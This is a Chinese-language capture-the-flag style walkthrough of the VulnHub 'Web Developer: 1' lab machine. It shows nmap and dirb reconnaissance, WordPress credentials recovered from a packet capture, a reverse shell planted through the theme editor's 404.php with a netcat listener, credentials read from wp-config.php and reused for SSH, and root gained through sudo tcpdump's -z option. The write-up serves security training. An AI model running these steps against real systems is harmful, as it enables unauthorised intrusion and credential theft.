靶机下载地址:https://www.vulnhub.com/entry/web-developer-1,288/
信息收集
主机发现
使用nmap扫描查看目标靶机端口开放情况
发现开放的端口有22 80
nmap -Pn -sV -p--A 192.168.233.140
目录爆破
dirb http://192.168.233.140
WEB渗透
访问80端口
发现该站点是由wordPress搭建的
通过刚刚目录爆破,访问/ipdata
将这个文件下载下来使用wireshark打开
分析http流数据包发现用户的登录信息
http.request.method == "POST"
结果如下,可以看到发往/wordpress/wp-login.php的POST报文中携带了
用户名webdeveloper,密码Te5eQg&4sBS!Yr$)wf%(DcAd
用找到的用户名密码登录wordpress,登录成功
利用wordpress的上传theme功能getshell
在下处发现一处文件上传页面
将主题背景改为Twenty Sixteen,点击select然后将404.php源码再次修改为反弹shell的代码
攻击机监听2333端口
nc -nlvp 1234
然后浏览器访问http://192.168.233.140//wp-content/themes/twentysixteen/404.php
可以看到kali这边成功反弹回来了一个shell,监听成功
提权
查看当前用户的suid权限
find / -perm -u=s -type f 2>/dev/null
没有什么可利用的命令
查看一下网站根目录下面的文件
cd /var/www/html
发现网站默认配置文件,查看其内容
cat wp-config.php
发现数据库的用户名和密码,尝试使用这个用户名和密码进行ssh远程连接(可以重新开启一个终端窗口,方便操作)
/** MySQL database username */
define('DB_USER', 'webdeveloper');
/** MySQL database password */
define('DB_PASSWORD', 'MasterOfTheUniverse');
查看webdeveloper用户的sudo命令\
sudo -l
发现tcpdump命令,直接上提权网站进行查找
webdeveloper@webdeveloper:~$ COMMAND='php /var/www/html/wp-content/themes/twentysixteen/404.php'
webdeveloper@webdeveloper:~$ TF=$(mktemp)
webdeveloper@webdeveloper:~$ echo "$COMMAND" > $TF
webdeveloper@webdeveloper:~$ chmod +x $TF
webdeveloper@webdeveloper:~$ sudo tcpdump -ln -i eth0 -w /dev/null -W 1 -G 1 -z $TF -Z root
成功提权